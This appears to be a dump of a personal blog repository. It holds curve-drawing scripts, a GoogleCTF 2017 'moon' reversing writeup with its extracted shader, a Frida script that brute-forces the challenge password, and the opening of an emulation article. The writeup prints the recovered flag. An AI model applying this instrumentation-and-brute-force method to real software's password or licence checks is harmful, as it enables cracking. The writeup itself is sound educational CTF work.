--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.png


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3c_hilbert.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | from PIL import Image, ImageDraw, ImageColor
 3 | 
 4 | sz = 256   # Image size (not read below: draw_hilbert derives its own canvas size)
 5 | mg = 32    # Image magnification (line segment size); the call below passes mg=16 instead
 6 | width = 3  # Line width; the call below passes width=7 instead
 7 | 
 8 | # Utility function for mapping list of colors names
 9 | def get_colors(colors, mode='RGB'):
10 |     if colors is None:
11 |         colors = 'black'
12 |     return list(map(lambda x: ImageColor.getcolor(x, mode), colors.split(',')))
13 | 
14 | def popcount(x):
15 |     n = 0
16 |     while x:
17 |         n += 1
18 |         x &= (x - 1)  # Clear the bottom-most set bit - cf snippet 0x2f
19 |     return n
20 | 
21 | def hilbert_direction(idx):  # Returns the (dx, dy) unit step for curve index idx
22 |     aa = 0xaa
23 |     aa |= aa << 8
24 |     aa |= aa << 16
25 |     aa |= aa << 32  # aa is now 0xaaaaaaaaaaaaaaaa: every odd bit of a 64-bit word
26 |     r = popcount(idx & (idx & aa) >> 1) & 1  # `>>` binds tighter than `&`: idx & ((idx & aa) >> 1)
27 |     s = popcount(-idx & (-idx & aa) >> 1) & 1  # Same parity, computed on -idx
28 |     return 1 - r - s, r - s  # One of (1, 0), (0, 1), (0, -1), (-1, 0)
29 | 
30 | def draw_hilbert(n, mg, width=1, colors=None, mode='RGB'):
31 |     # how much to shift lines by
32 |     e = width >> 1
33 |     # Calculate canvas size
34 |     sz = mg * ((1 <<  n) - 1) + width
35 |     pos = (e, e)
36 |     img = Image.new(mode, (sz, sz), get_colors('white', mode)[0])
37 |     draw = ImageDraw.Draw(img)
38 |     colors = get_colors(colors, mode)
39 |     for i in range(1, 1 << (n << 1)):
40 |         dx, dy = hilbert_direction(i)
41 |         npos = (pos[0] + mg * dx, pos[1] - mg * dy)
42 |         line = [ pos, npos ]
43 |         draw.line(line, fill=colors[(i - 1) % len(colors)], width=width)
44 |         pos = npos
45 |     return img
46 | 
47 | img = draw_hilbert(5, mg=16, colors='blue,red',width=7)  # Order 5; segments alternate blue/red
48 | img.show()
49 | img.save('xorpd_0x3c_hilbert.png', optimize=True, dpi=(150, 150))
50 | 


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.png


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3d_morton.py:
--------------------------------------------------------------------------------
 1 | from __future__ import print_function
 2 | from PIL import Image, ImageDraw, ImageColor
 3 | 
 4 | n = 5      # Generation number (not read below: the call at the bottom passes 5 directly)
 5 | mg = 32    # Image magnification (line segment size); the call below passes mg=16 instead
 6 | width = 3  # Line width; the call below passes width=1 instead
 7 | 
 8 | def morton(n):  # Yields 4**n grid points (x, y), starting at (0, 0)
 9 |     pos = [ 0, 0 ]
10 |     yield tuple(pos)
11 |     for i in range(1, 1 << (2 * n)):
12 |         k = 1  # Bit currently being toggled, starting from the lowest
13 |         while True:
14 |             pos[0] ^= k  # Toggle bit k of x
15 |             k &= ~pos[0]  # k becomes 0 if that bit is now set (no carry needed)
16 |             if not k:
17 |                 break
18 |             pos[1] ^= k  # Otherwise carry into the same bit of y
19 |             k &= ~pos[1]
20 |             if not k:
21 |                 break
22 |             k <<= 1  # Both bits wrapped to 0: carry on to the next bit position
23 |         yield tuple(pos)
24 | 
25 | def disinterleave(z):
26 |     x = 0
27 |     y = 0
28 |     k = 0
29 |     while z:
30 |         x |= (z & 1) << k
31 |         y |= (z & 2) << k
32 |         z >>= 2
33 |         k += 1
34 |     y >>= 1
35 |     return x, y
36 | 
37 | def interleave(x, y):
38 |     z = 0
39 |     y <<= 1
40 |     k = 0
41 |     while x or y:
42 |         z |= ((x & 1) | (y & 2)) << k
43 |         x >>= 1
44 |         y >>= 1
45 |         k += 2
46 |     return z
47 | 
48 | def morton2(n):  # Yields disinterleave(i) for every index i in [0, 4**n)
49 |     for i in range(1 << (2 * n)):
50 |         yield disinterleave(i)
51 | 
52 | def scale_point(pt, corner, mg):
53 |     return corner[0] + pt[0] * mg, corner[1] + pt[1] * mg
54 | 
55 | def draw_morton(n, mg, width, color='black'):
56 |     sz = width + mg * ((1 << n) - 1)
57 |     img = Image.new('RGB', (sz, sz), ImageColor.getcolor('white', 'RGB'))
58 |     draw = ImageDraw.Draw(img)
59 |     gen = morton(n)
60 |     corner = (width >> 1, width >> 1)
61 |     scaler = lambda x: scale_point(x, corner, mg)
62 |     pos = next(gen)
63 |     for npos in gen:
64 |         draw.line(list(map(scaler, [ pos, npos ])), fill=ImageColor.getcolor(color, img.mode), width=width)
65 |         pos = npos
66 |     return img
67 | 
68 | img = draw_morton(5, mg=16, color='black', width=1)  # Order 5, 16-pixel steps, 1-pixel black line
69 | img.show()
70 | img.save('xorpd_0x3d_morton.png', optimize=True, dpi=(150, 150))
71 | 


--------------------------------------------------------------------------------
/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2016-10-12-xchg-rax-rax-solutions/xorpd_0x3f_hanoi.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2017-06-19
  4 | title: GoogleCTF 2017 Reversing/Moon writeup
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | Last weekend I participated in the [Google CTF 2017](https://capturetheflag.withgoogle.com/) as part of the glorious team "*63 7c 77 7b f2 6b 6f c5 30 01 67 2b fe d7 ab 76*" composed of [AlexF0rtune](https://twitter.com/AlexF0rtune) and me. Among the many tough and fun challenges that we attempted, and the few ones that we actually solved, *moon* was certainly the most entertaining one for me, so I decided to prepare a writeup of my solution.
  9 | 
 10 | The problem simply states:
 11 | 
 12 | > What's the password?
 13 | > [moon.zip](moon.zip)
 14 | 
 15 | 
 16 | ## Static analysis
 17 | 
 18 | After extracting the ZIP file, we see our target is a Win32 executable, using OpenGL to render a simple UI asking for a password of length 32. For wrong passwords it will display the message: "*Nope*".
 19 | 
 20 | As usual with this kind of challenge, one would start by looking for occurrences of this string within the executable, and find code referencing said string. Opening the executable with [IDA Pro](https://www.hex-rays.com/products/ida/) and searching for strings containing `Nope` we find the string `____NopeGood` referenced in `sub_402660`. Decompiling and slightly reformatting the relevant code results in:
 21 | 
 22 | ```cpp
 23 | // const char aNopegood[] = "    NopeGood";
 24 | v12 = dword_4CA0AC;
 25 | v15 = 4 * v12;
 26 | v16 = (unsigned __int8)aNopegood[v15];
 27 | ```
 28 | 
 29 | The value `dword_4CA0AC` acts as an index into the aforementioned string. If we want to succeed (i.e. obtain `Good`) we need its value to be 2. If we search for occurrences where the value at `4CA0AC` is modified to 2 we obtain the following occurrence in the function `sub_498A10`:
 30 | 
 31 | ![](ida.png)
 32 | 
 33 | In order to pass the test, both buffers passed to `memcmp` have to match.
 34 | 
 35 | 
 36 | ## Dynamic analysis
 37 | 
 38 | To simplify the process of reversing, we used [x64dbg](http://x64dbg.com/) to quickly debug and inspect the memory of the program while it's running.
 39 | 
 40 | These buffers each seem to contain 512 bytes of what looks like the hexadecimal representation of a hash. The contents pointed by `rcx` change every time the password is modified (*computed hash string*). The contents pointed by `rdx` are constant (*expected hash string*) and its first bytes are:
 41 | 
 42 | ```
 43 |                    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
 44 | 0000000000F86BD0  33 30 63 37 65 61 64 39 37 31 30 37 37 37 35 39  30c7ead971077759         
 45 | 0000000000F86BE0  36 39 62 65 34 62 61 30 30 63 66 35 35 37 38 66  69be4ba00cf5578f         
 46 | ...
 47 | ```
 48 | 
 49 | After reversing `sub_498A10`, we realize that the *computed buffer* is generated by converting each integer from a buffer `uint32_t hash[64]` (i.e. length 0x100) into a hexadecimal string via `%.8x` (see `sub_4016D0`). Concatenating all these hexadecimal strings results in the aforementioned hexadecimal string. Relevant code:
 50 | 
 51 | ```cpp
 52 | v14 = (__int128 *)&v41;
 53 | // ...
 54 | if ((unsigned __int8)sub_401BF0(qword_4CA080, (unsigned __int64)&v41)) {
 55 |   do {
 56 |     v15 = *(_DWORD *)v14;
 57 |     v28 = 0i64;
 58 |     v29 = 0;
 59 |     sub_4016D0(&v28, "%.8x", v15);
 60 |     v16 = (char *)&v28 + strlen((const char *)&v28);
 61 |     if ( v16 - (char *)&v28 > 0x7FFFFFFFFFFFFFFFi64 - Size )
 62 |       sub_4921C0("basic_string::append");
 63 |     sub_486EE0(&Memory, &v28, v16 - (char *)&v28);
 64 |     v14 = (__int128 *)((char *)v14 + 4);
 65 |   }
 66 |   // ...
 67 | }
 68 | ```
 69 | 
 70 | This buffer pointed by `v41` contains the raw bytes of the hash. This hash is updated by the function `sub_401BF0(const char* password, char* hash)` every time the user-supplied password reaches 32 characters in length.
 71 | 
 72 | Brief pause:
 73 | > As you see, instead of reverse engineering entire functions and then making sense of the code, our approach could be described as doing inverse data-tainting manually and reverse engineering only the necessary bits along the way.
 74 | 
 75 | Inside `sub_401BF0` we attempted to locate where the data copied to the hash pointer `v41` was coming from. It was being copied from another buffer at address `0000000007478000` (in that particular execution) which looked "quite suspicious" due to the following reasons:
 76 | 
 77 | 1. Hardware breakpoints on memory accesses were not working.
 78 | 2. This buffer was filled right after calling functions from my GPU driver libraries (in my case `ig9icd64.dll`), most likely just its OpenGL implementation.
 79 | 
 80 | ```
 81 |                    0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
 82 | 0000000007478000  01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00  ................         
 83 | 0000000007478010  01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00  ................         
 84 | ...        
 85 | 0000000007478100  E3 5C A9 DE C6 42 8F 29 61 7C A1 5C 44 62 87 AB  ã\©ÞÆB.)a|¡\Db.«         
 86 | 0000000007478110  E7 1D B9 DA C2 03 9F 2D 65 3D B1 58 40 23 97 AF  ç.¹ÚÂ..-e=±X@#.¯         
 87 | ...
 88 | ```
 89 | 
 90 | We suspect GPGPU is coming into play and that compute shaders might be responsible for generating the hash.
 91 | 
 92 | 
 93 | ## Extracting compute shaders
 94 | 
 95 | Looking at the strings in the executable, it's clear that no compute shader is visible as plaintext. However, rather than inspecting which of the many functions is responsible for decrypting the GLSL source, or trying to locate it somewhere within the user address space, we fetch it from where the application could never hide it: the GPU driver libraries.
 96 | 
 97 | For that purpose we use [Apitrace](http://apitrace.github.io/). We spawn *moon.exe* with it, in *OpenGL* mode, fill out a dummy password, close the application and proceed to inspect the list of captured frames. From the long list of frames, most with 1027 calls, we notice one with 1041 calls. As expected, the small difference here is that the application maps a shader storage buffer and fills it with `GL_COMPUTE_SHADER` data.
 98 | 
 99 | ![](apitrace.png)
100 | 
101 | Apitrace provides us the application-supplied source code for the mapped shader, which we auto-formatted for readability reasons. You can read the entire GLSL source code at: [moon.glsl](moon.glsl).
102 | 
103 | Next, we will discuss the most important parts of the shader. Firstly, we observed the following input/output buffers:
104 | 
105 | ```glsl
106 | layout(std430, binding = 0) buffer shaderExchangeProtocol {
107 |   uint state[64];
108 |   uint hash[64];
109 |   uint password[32];
110 | };
111 | ```
112 | 
113 | The meaning of `password` is clear from the context. Inspecting the GLSL code we notice that every invocation of the shader results in a `uint32_t` value being updated in `hash[idx]`. Similarly, the value `state[idx]` changes from 1 to 2 to mark that particular task as finished.
114 | 
115 | ```glsl
116 | if ((idx & 1) == 0) {
117 |   final = hash_alpha(password[idx / 2]);
118 | } else {
119 |   final = hash_beta(password[idx / 2]);
120 | }
121 | ```
122 | 
123 | For every character in `password`, two different hashes are computed, `hash_alpha` and `hash_beta`, each resulting in a `uint32_t` value that is stored in the `hash` buffer after XOR'ing it further. More details on these operations will be given in the following paragraphs.
124 | 
125 | Our goal now is to recover the password from the expected hash. Here we noticed two possible approaches, a quick one (which we used in the CTF), and a more elegant one (for the sake of perfectionism and pleasing mathematicians).
126 | 
127 | 
128 | ## Strategy #1: The Hacker's Approach
129 | 
130 | Every invocation of the compute shader takes into account a **single character** of the password in order to generate a `uint32_t` value of the hash, except for the final part that iterates over the whole password:
131 | 
132 | ```glsl
133 | uint h = 0x5a;
134 | for (i = 0; i < 32; i++) {
135 |   uint p = password[i];
136 |   uint r = (i * 3) & 7;
137 |   p = (p << r) | (p >> (8 - r));
138 |   p &= 0xff;
139 |   h ^= p;
140 | }
141 | final ^= (h | (h << 8) | (h << 16) | (h << 24));
142 | ```
143 | 
144 | However, since `p` is always masked with 0xFF, `h` will be in range [0x00, 0xFF]. Thus, there are only 256 possible values with which the `final` variable could be XOR'ed (e.g. `01010101`, `02020202`, etc.). This can be bruteforced by iterating over every possible value of `h`.
145 | 
146 | * __Bruteforcing algorithm__: For every position `i` in the password, we try character `c` and temporarily set `password[i] = c`. We calculate the first of the two resulting `uint32_t` hash values (we don't need the second one!) and, as described before, we XOR the result with every of the 256 possible values with which `final` could be XOR'ed. If there's a match, we keep the character `c` and move on with the next `i`.
147 | 
148 | Considering a 32-byte password and 256 choices for each `c` and `h`, we get the following worst case scenario: 32 * 256 * 256 = 2097152 attempts.
149 | 
150 | We could reimplement the whole algorithm again, which would certainly save computing time. But on a CTF, it's *our* time that matters. To solve the challenge as quickly as possible, we used [Frida](https://www.frida.re/) to instrument *moon.exe*, and automatically execute the function `sub_401BF0` for arbitrary passwords. You can find the source code at [bruteforcer.py](bruteforcer.py).
151 | 
152 | 
153 | To explain the code briefly: We allocate the buffers that will hold both the password and hash. We will pass them as arguments to the *hashgen* function (aka. `sub_401BF0`), which is transformed into a `NativeFunction` to be invoked later on directly from our code.
154 | 
155 | ```javascript
156 | // Buffers 
157 | var pswd_ptr = Memory.alloc(0x20);
158 | var hash_ptr = Memory.alloc(0x400);
159 | 
160 | var hashgen_ptr = new NativePointer(0x401BF0);
161 | var hashgen = new NativeFunction(hashgen_ptr, 'int', ['pointer', 'pointer']);
162 | ```
163 | 
164 | Then, for every choice of `i`, `c`, `h`, we have the following block of code (i.e. deep within three nested loops).
165 | 
166 | ```javascript
167 | var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24));
168 | Memory.writeU8(pswd_ptr.add(i), c);
169 | hashgen(pswd_ptr, hash_ptr);
170 | var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh;
171 | if (to_uint32(dword) == to_uint32(expected[2*i])) {
172 |   valid = true;
173 |   break;
174 | }
175 | ```
176 | 
177 | After around 1 minute of computing time we obtain the following output. Challenge solved!
178 | 
179 | ```
180 | CTF{OpenGLMoonMoonG0esT0TheMoon}
181 | ```
182 | 
183 | Small addendum:
184 | * Note that we didn't need to understand what `hash_alpha` and `hash_beta` were doing. We recovered the entire password just by cleverly bruteforcing over (half of!) the expected hash buffer entries.
185 | * We are aware that `h` does not need to be bruteforced again for `i > 0` and by restricting ourselves to printable choices of `c` we could bring the worst case scenario down to: 32 * (0x7E - 0x20 + 1) + 256 = 3296 attempts (x100 speedup). However, the naive approach was fast enough for us.
186 | 
187 | 
188 | ## Strategy #2: The Mathematician's Approach
189 | 
190 | We start by analyzing `hash_alpha` and `hash_beta`. They are identical, except that they access different indices from the vector `calc(p)`, corresponding to its components X and Y respectively. The function `calc` converts the character `p`, interpreted as degrees, to radians stored in the variable `r`. Then, it computes the following:
191 | 
192 | ![$$
193 |   \begin{pmatrix}
194 |     \cos{r} & -\sin{r} & 0 \\
195 |     \sin{r} & \cos{r} & 0 \\
196 |     0 & 0 & 1 \\
197 |   \end{pmatrix}
198 |   \cdot
199 |   \begin{pmatrix} 1024 \\ 0 \\ 0 \end{pmatrix} +
200 |   \begin{pmatrix} 2048 \\ 2048 \\ 0 \end{pmatrix} 
201 | $$](latex-1.png)
202 | 
203 | Thus we know that the intermediate values are in range [1024, 3072] since:
204 | * *X*: `uint(calc(p)[0]) == 1024*cos(r) + 2048`.
205 | * *Y*: `uint(calc(p)[1]) == 1024*sin(r) + 2048`.
206 | 
207 | Given *X* and *Y* we could compute back `p` via:
208 | 
209 | ![$$
210 |   \text{degrees}(\text{atan2}(\frac{Y - 2048}{1024}, \frac{X - 2048}{1024}))
211 | $$](latex-2.png)
212 | 
213 | Next, we analyze the `extend` function:
214 | 
215 | ```glsl
216 | uint extend(uint e) {
217 |   uint i;
218 |   uint r = e ^ 0x5f208c26;
219 |   for (i = 15; i < 31; i += 3) {
220 |     uint f = e << i;
221 |     r ^= f;
222 |   }
223 |   return r;
224 | }
225 | ```
226 | 
227 | The argument `e` is XOR'ed with a constant and then again with multiple copies of itself shifted by some amount. *Luckily* for us those shifts are all at least 15 bits, so the low 15 bits are left untouched, which is enough to keep our values *X*,*Y* undamaged as they are in range [1024, 3072].
228 | 
229 | This concludes the `hash_alpha` and `hash_beta` functions. Next, we analyze the code modifying the `final` variable inside the `main` function. The first loop is actually a constant-ish XOR (only depends on the index, which is known), so we are able to revert this as well:
230 | 
231 | ```glsl
232 | uint i;
233 | for (i = 0; i < 32; i += 6) {
234 |   final ^= idx << i;
235 | }
236 | ```
237 | 
238 | For the final part, as mentioned in the previous section, we could try bruteforcing which of the 256 possible values of `h` is the correct one. However, note that undoing the previous constant XOR's should have yielded the values for *X* and *Y*, whose bits with index #14 to #12 should be zero (since both values are below 4096 = 2^12). This indirectly tells you the corresponding bits of `h`, which slightly reduces the entropy.
239 | 
240 | Putting it all together, for some `h`, the steps to recover the password character at index `i`, given the corresponding hashes *A* and *B*, are as follows:
241 | 1. Revert the XORs in `main` for *A* and *B*. 
242 | 2. Revert the XOR in `extend` for *A* and *B*.
243 | 3. Compute `X = (A ^ 0x5F208C26) & 0x7FFF` and `Y = (B ^ 0x5F208C26) & 0x7FFF`.
244 | 4. Compute `c = deg(atan2((Y-2048)/1024, (X-2048)/1024))`.
245 | 5. Set `password[i] = c`.
246 | 
247 | Once again, challenge solved!
248 | 
249 | There is no code available for this approach since it's not the strategy we followed in the CTF, but we found it quite an elegant approach worthy of discussion.
250 | 


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/_main.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/_main.pdf


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/apitrace.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/apitrace.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/bruteforcer.py:
--------------------------------------------------------------------------------
 1 | import frida
 2 | import time
 3 | 
 4 | code = """
 5 | 'use strict';
 6 | 
 7 | var pswd_ptr = Memory.alloc(0x20);
 8 | var hash_ptr = Memory.alloc(0x400);
 9 | 
10 | var keygen_ptr = new NativePointer(0x401BF0);
11 | var keygen = new NativeFunction(keygen_ptr, 'int', ['pointer', 'pointer']);
12 | 
13 | var expected = [
14 |     0x30c7ead9, 0x71077759,
15 |     0x69be4ba0, 0x0cf5578f,
16 |     0x1048ab13, 0x75113631,
17 |     0xdbb6871d, 0xbe35162b,
18 |     0x1c62e982, 0xeb6a7512,
19 |     0xf3274743, 0xfb2e55c8,
20 |     0x18912779, 0xef7a3416,
21 |     0x9a838666, 0xff3994bb,
22 |     0x4d3c6e14, 0xba2d732f,
23 |     0x14414f2c, 0x1cb5d384,
24 |     0x4935aebb, 0xbe3fb206,
25 |     0x343a004e, 0x18a092da,
26 |     0xba02e3c0, 0x96987154,
27 |     0x8ed2c372, 0xeb68d1af,
28 |     0x41152cb3, 0xb61f300e,
29 |     0x3c1a8246, 0x108010d2,
30 |     0x82e16df8, 0xae7bff6c,
31 |     0xb6314d4a, 0xd38b5f97,
32 |     0x79ef2320, 0x8efe3e1b,
33 |     0x69970042, 0x9eae1fa9,
34 |     0x3c036e5d, 0xcbe87d32,
35 |     0xbe1ecfac, 0x2452ddfd,
36 |     0xc704a00e, 0xa24fbc21,
37 |     0x61b7824a, 0x968e9da1,
38 |     0xdb756712, 0xbe3e7b3d,
39 |     0x3420c8f3, 0x3c37dba4,
40 |     0x2072a941, 0xd799ba2e,
41 |     0xebbf8619, 0x1cb59aa4,
42 |     0x9a80ebe0, 0xb61a7974,
43 |     0x1888cb62, 0x341259f6,
44 |     0x2848aad4, 0x4df2b809,
45 |     0x383e0943, 0x7928980f
46 | ];
47 | 
48 | function to_uint32(n) {
49 |     return (n + 0x100000000) & 0xFFFFFFFF;
50 | }
51 | 
52 | Interceptor.attach(keygen_ptr, {
53 |     onEnter: function (args) {
54 |         for (var i = 0; i < 0x20; i++) {
55 |             console.log("Index " + i + " of 32");
56 |             for (var c = 0; c < 0x100; c++) {
57 |                 var valid = false;
58 |                 for (var h = 0; h < 0x100; h++) {
59 |                     var maskh = to_uint32(h | (h << 8) | (h << 16) | (h << 24));
60 |                     Memory.writeU8(pswd_ptr.add(i), c);
61 |                     keygen(pswd_ptr, hash_ptr);
62 |                     var dword = Memory.readU32(hash_ptr.add(8*i)) ^ maskh;
63 |                     if (to_uint32(dword) == to_uint32(expected[2*i])) {
64 |                         valid = true;
65 |                         break;
66 |                     }
67 |                 }
68 |                 if (valid) break;
69 |             }
70 |         }
71 |         console.log(hexdump(pswd_ptr, {length: 32}));
72 |         console.log(Memory.readUtf8String(pswd_ptr, 32));
73 |     }
74 | });
75 | """
76 | 
77 | def on_message(message, data):  # Registered below as the script's 'message' handler; `data` is ignored
78 |     print(message)
79 |     
80 | pid = frida.spawn(['moon/moon.exe'])
81 | frida.resume(pid)
82 | 
83 | session = frida.attach(pid)
84 | script = session.create_script(code)  # `code` is the JavaScript payload defined above
85 | script.on('message', on_message)
86 | script.load()  # NOTE(review): nothing after this keeps the process alive, and `time` is imported but unused - confirm whether a wait was intended
87 | 


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/ida.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/ida.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/latex-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-1.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/latex-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/latex-2.png


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/moon.glsl:
--------------------------------------------------------------------------------
 1 | #version 430
 2 | layout(local_size_x = 8, local_size_y = 8) in ;
 3 | layout(std430, binding = 0) buffer shaderExchangeProtocol {
 4 |   uint state[64];
 5 |   uint hash[64];
 6 |   uint password[32];
 7 | };
 8 | vec3 calc(uint p) {  // Maps p (taken as an angle in degrees) to a point 1024 units away from (2048, 2048, 0)
 9 |   float r = radians(p);
10 |   float c = cos(r);
11 |   float s = sin(r);
12 |   mat3 m = mat3(c, -s, 0.0, s, c, 0.0, 0.0, 0.0, 1.0);  // GLSL fills matrices column by column: column 0 is (c, -s, 0)
13 |   vec3 pt = vec3(1024.0, 0.0, 0.0);
14 |   vec3 res = m * pt;  // pt only has an X component, so this is 1024 * (column 0 of m)
15 |   res += vec3(2048.0, 2048.0, 0.0);
16 |   return res;
17 | }
18 | uint extend(uint e) {  // XORs e with a constant and with copies of e shifted left by 15..30 bits
19 |   uint i;
20 |   uint r = e ^ 0x5f208c26;
21 |   for (i = 15; i < 31; i += 3) {  // i = 15, 18, 21, 24, 27, 30
22 |     uint f = e << i;  // Shifted copies only reach bit 15 and above; bits 0-14 of r stay e ^ constant
23 |     r ^= f;
24 |   }
25 |   return r;
26 | }
27 | uint hash_alpha(uint p) {  // extend() of the first component of calc(p), converted to uint
28 |   vec3 res = calc(p);
29 |   return extend(uint(res[0]));
30 | }
31 | uint hash_beta(uint p) {  // extend() of the second component of calc(p), converted to uint
32 |   vec3 res = calc(p);
33 |   return extend(uint(res[1]));
34 | }
35 | void main() {  // Computes hash[idx] for one invocation and flags state[idx] as done
36 |   uint idx = gl_GlobalInvocationID.x + gl_GlobalInvocationID.y * 8;  // Flat index: x + 8 * y
37 |   uint final;
38 |   if (state[idx] != 1) {  // Only slots whose state is 1 are processed
39 |     return;
40 |   }
41 |   if ((idx & 1) == 0) {  // Even idx -> hash_alpha, odd idx -> hash_beta, both on password[idx / 2]
42 |     final = hash_alpha(password[idx / 2]);
43 |   } else {
44 |     final = hash_beta(password[idx / 2]);
45 |   }
46 |   uint i;
47 |   for (i = 0; i < 32; i += 6) {  // i = 0, 6, ..., 30
48 |     final ^= idx << i;  // Depends only on idx, not on the password
49 |   }
50 |   uint h = 0x5a;
51 |   for (i = 0; i < 32; i++) {  // Folds all 32 password entries into the single byte h
52 |     uint p = password[i];
53 |     uint r = (i * 3) & 7;
54 |     p = (p << r) | (p >> (8 - r));  // Together with the mask below: 8-bit rotate-left by r when p fits in a byte
55 |     p &= 0xff;
56 |     h ^= p;
57 |   }
58 |   final ^= (h | (h << 8) | (h << 16) | (h << 24));  // h replicated into all four bytes
59 |   hash[idx] = final;
60 |   state[idx] = 2;  // Mark this slot as finished
61 |   memoryBarrierShared();
62 | }
63 | 


--------------------------------------------------------------------------------
/posts/2017-07-19-googlectf-2017-moon/moon.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AlexAltea/blog/64c36758a11356204ea937897f0df56b5d4fb768/posts/2017-07-19-googlectf-2017-moon/moon.zip


--------------------------------------------------------------------------------
/posts/2018-04-18-lle-vs-hle/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2018-04-18
 4 | title: LLE vs HLE and their tradeoffs
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | ## Introduction
 9 | 
10 | This article aims to give an intuitive understanding of the terms "*Low-Level Emulation*" (LLE) and "*High-Level Emulation*" (HLE) often heard in the emulation scene, their differences and tradeoffs in development/performance costs, and how developers choose one paradigm or the other.
11 | 
12 | Machines are made of several *layers of abstraction*, each of them relying on the layer below to perform some particular task. In the context of gaming consoles, you might consider these layers (ordered from higher to lower level):
13 | 
14 | - Game
15 | - Game engine
16 | - System libraries
17 | - Kernel/drivers
18 | - Hardware
19 |  
20 | That's where these "*low-level*" or "*high-level*" terms come from. Something is more "*high-level*" when it has more layers of abstraction below it, and it's more "*low-level*" when it has more layers of abstraction above it. With so many layers, the terms "low" and "high" can become quite subjective (developers can't even agree about whether some emulators are HLE or LLE). Furthermore, you could go even below the hardware level and start thinking about transistors, atoms, etc. as even deeper layers of abstraction. Similarly, there are also even higher levels like the game scripts that are sometimes used to handle events/dialogues in a game. Of course, for most emulators, these layers are either too low, or too high. Why?
21 | 
22 | ## Emulation paradigms
23 | 
24 | Let's tackle this question after giving an intuitive notion of what emulation is. Emulating a system is all about putting a "*barrier*" between two adjacent layers of abstraction. For instance:
25 |  
26 | - "*LLE emulators*" ([EPSXE](http://www.epsxe.com/), [PCSX2](https://pcsx2.net/)): They put the barrier between the hardware and the kernel. The entire software stack would run as usual thinking it's on a real PS1, PS2 etc., but whenever the hardware is accessed (e.g. PCI configuration registers, MMIO accesses, etc.) the emulator would intercept that and execute whatever the emudevs wanted. This is the reason why you get the original console menus and the overall "look and feel" of the console.
27 | - "*HLE emulators*" ([RPCS3](https://rpcs3.net/), [Citra](https://citra-emu.org/)): They put the barrier between the kernel and userland (i.e. applications, games, etc.). The application runs as usual (of course, after translating userland instructions), but whenever it needs to access the operating system (e.g. to open files, to map memory, to create threads), that request aka. syscall will be intercepted and handled by some code written by the emudevs. This is the reason why you can typically just drag-and-drop a game and start playing it without booting any underlying OS.
28 |  
29 | Back to the original question, why do emulators pick the barriers always at these two "hot spots", i.e. LLE (hardware and kernel) and HLE (kernel and userland)?
30 |  
31 | When you place this "emulation" barrier between two layers, you have to **reimplement** the layer below (i.e. reimplement the hardware on LLE, reimplement the kernel on HLE), so that the layer(s) above it can **execute** successfully. This results in two costs that you have to balance: "*development time*" and "*execution time*". Let me explain why this balance is important with a few extreme examples of poor balances:
32 |  
33 | - *Too high-level*: What would happen if you'd put that barrier between the game engine and the actual game? This idea used to be not so crazy, as it's what [ScummVM](https://www.scummvm.org/) does. However, game engines these days are insanely complex with several million lines of code; it would take you centuries as a single developer to write an emulator that operated at such high levels. The "*development time*" would be massive, but the "*execution time*" (i.e. the emulator's performance) would be pretty good, since all the complex tasks have been reimplemented natively for the host system.
34 |  
